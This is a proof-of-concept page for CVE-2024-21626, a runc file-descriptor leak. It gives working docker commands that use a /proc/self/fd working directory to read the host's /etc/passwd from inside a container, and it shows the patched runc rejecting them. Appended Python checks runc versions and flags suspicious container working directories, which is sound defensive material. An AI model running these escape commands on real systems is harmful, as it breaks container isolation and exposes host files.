CVE-2024-21626 PoC — runc security vulnerability

Associated Vulnerability
Title: runc security vulnerability (CVE-2024-21626)
Description: runc is a CLI (command-line interface) tool for spawning and running containers according to the OCI specification. runc versions before 1.1.12 contain a security vulnerability that stems from an internal leak of file descriptors (fds), which leads to leaks out of multiple containers.
Readme
## about

Steps to reproduce

Ensure the kernel is recent enough (`>= 5.4`, `4.19`, ...) and that `openat2` appears in `/proc/kallsyms`. The affected runc range is `v1.0.0-rc93 <= runc <= 1.1.11`.

```
$ grep openat2 /proc/kallsyms
ffffffffa64290d0 T __pfx___audit_openat2_how
ffffffffa64290e0 T __audit_openat2_how
ffffffffa666de90 t __pfx_do_sys_openat2
ffffffffa666dea0 t do_sys_openat2
ffffffffa666e020 t __pfx___do_sys_openat2
ffffffffa666e030 t __do_sys_openat2
ffffffffa666e150 T __pfx___x64_sys_openat2
ffffffffa666e160 T __x64_sys_openat2
ffffffffa666e190 T __pfx___ia32_sys_openat2
ffffffffa666e1a0 T __ia32_sys_openat2
ffffffffa69871e0 T __pfx_io_openat2_prep
ffffffffa69871f0 T io_openat2_prep
ffffffffa6987280 T __pfx_io_openat2
ffffffffa6987290 T io_openat2
ffffffffa863d1e0 d event_exit__openat2
ffffffffa863d260 d event_enter__openat2
ffffffffa863d2e0 d __syscall_meta__openat2
ffffffffa863d320 d args__openat2
ffffffffa863d340 d types__openat2
ffffffffa8affb48 d __event_exit__openat2
ffffffffa8affb50 d __event_enter__openat2
ffffffffa8b02b18 d __p_syscall_meta__openat2
ffffffffa8b056f0 d _eil_addr___ia32_sys_openat2
ffffffffa8b05700 d _eil_addr___x64_sys_openat2
```

Read a host file:

```
$ tail -n1 /etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line ubuntu tail -n1 ../../../../../etc/passwd |& grep -Ev Error ; done
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
```

Find the fd number:

```
$ seq 10 | while read line;do docker run --rm -w /proc/self/fd/$line -tid --name s-$line ubuntu   ; done
$ docker ps -a | grep -P 's-\d$'
c171e8ac9a1a  ubuntu    "bash"  About a minute ago   Up About a minute  s-7
```

The number is 7 on my machine; then exec into the already running container:

```
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
gnome-initial-setup:x:126:65534::/run/gnome-initial-setup/:/bin/false
```

After replacing runc:

```
$ cp runc.amd64 /usr/bin/runc
$ docker exec -ti -w /proc/self/fd/7 xxxxx tail -n1 /proc/self/cwd/../../../../../etc/passwd
OCI runtime exec failed: exec failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type
```
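The error above is the patched runc refusing a working directory that resolves outside the container's rootfs. For an operator who wants to assess exposure before and after patching, the following Python is an added defender-side example (it is not part of the original PoC and not runc's own code): it parses `runc --version` output against the affected range stated above, and it audits the `Config.WorkingDir` of `docker inspect` output (the OCI `process.cwd`) for a working directory under `/proc/self/fd/`, the trigger the reproduction steps rely on. The `/proc/<pid>/fd` and `/proc/thread-self/fd` variants, and the normalisation of `..` components, go slightly beyond the page; the version strings and inspect records are constructed sample input.

```python
"""Exposure checks for CVE-2024-21626 (added example; constructed inputs)."""
import posixpath
import re
from typing import List, Optional, Tuple

# Affected range as stated in the README: v1.0.0-rc93 <= runc <= 1.1.11.
FIRST_BAD = (1, 0, 0, 93)        # v1.0.0-rc93
FIRST_FIXED = (1, 1, 12, None)   # 1.1.12 (rc == None means a final release)

_VERSION_RE = re.compile(r"runc version\s+v?(\d+)\.(\d+)\.(\d+)(?:-rc(\d+))?")

# cwd values that live in a process's fd table rather than in the rootfs.
# `self` is what the PoC uses; a numeric pid or thread-self is the same idea.
_PROC_FD_RE = re.compile(r"^/proc/(?:self|thread-self|\d+)/fd(?:/|$)")


def parse_runc_version(text: str) -> Optional[Tuple[int, int, int, Optional[int]]]:
    """Extract (major, minor, patch, rc) from `runc --version` output."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else None)


def _key(v: Tuple[int, int, int, Optional[int]]) -> Tuple[int, int, int, int, int]:
    # Sort key in which an rc release orders before its final release.
    major, minor, patch, rc = v
    return (major, minor, patch, 1 if rc is None else 0, rc or 0)


def is_vulnerable_runc(version_output: str) -> bool:
    """True if the parsed runc version falls inside the affected range."""
    v = parse_runc_version(version_output)
    if v is None:
        raise ValueError("could not parse runc version from: %r" % version_output)
    return _key(FIRST_BAD) <= _key(v) < _key(FIRST_FIXED)


def cwd_is_suspicious(cwd: str) -> bool:
    """True if an OCI process.cwd points into a /proc/.../fd directory.

    Both the raw path and its normalised form are tested so that
    `/tmp/../proc/self/fd/3` is caught as well as `/proc/self/fd/3`.
    """
    if not cwd.startswith("/"):
        return True  # the OCI spec requires an absolute cwd; anything else is malformed
    return bool(_PROC_FD_RE.match(cwd)) or bool(_PROC_FD_RE.match(posixpath.normpath(cwd)))


def audit_containers(inspect_output: List[dict]) -> List[str]:
    """Return the names of containers (from parsed `docker inspect` JSON)
    whose configured WorkingDir is suspicious. An empty WorkingDir means
    Docker uses `/`, which is fine."""
    flagged = []
    for c in inspect_output:
        cwd = c.get("Config", {}).get("WorkingDir") or "/"
        if cwd_is_suspicious(cwd):
            flagged.append(c.get("Name", "<unnamed>"))
    return flagged


# Constructed sample data standing in for `docker inspect $(docker ps -aq)`.
SAMPLE_INSPECT = [
    {"Name": "/s-7", "Config": {"WorkingDir": "/proc/self/fd/7"}},
    {"Name": "/web", "Config": {"WorkingDir": "/app"}},
    {"Name": "/odd", "Config": {"WorkingDir": "/tmp/../proc/self/fd/3"}},
    {"Name": "/plain", "Config": {"WorkingDir": ""}},
]

if __name__ == "__main__":
    # Constructed version strings; the real format is the first line of `runc --version`.
    for sample in ("runc version 1.1.11", "runc version 1.1.12", "runc version v1.0.0-rc93"):
        print("%-26s vulnerable=%s" % (sample, is_vulnerable_runc(sample)))
    print("flagged containers:", audit_containers(SAMPLE_INSPECT))
```

In practice the inspect list comes from `json.load` over `docker inspect $(docker ps -aq)`, and the version string from `runc --version`. The audit only finds containers whose image or run command set the trigger cwd; it is a detection aid, and the fix remains upgrading runc to 1.1.12 or later, which performs the rootfs check itself, as the error message above shows.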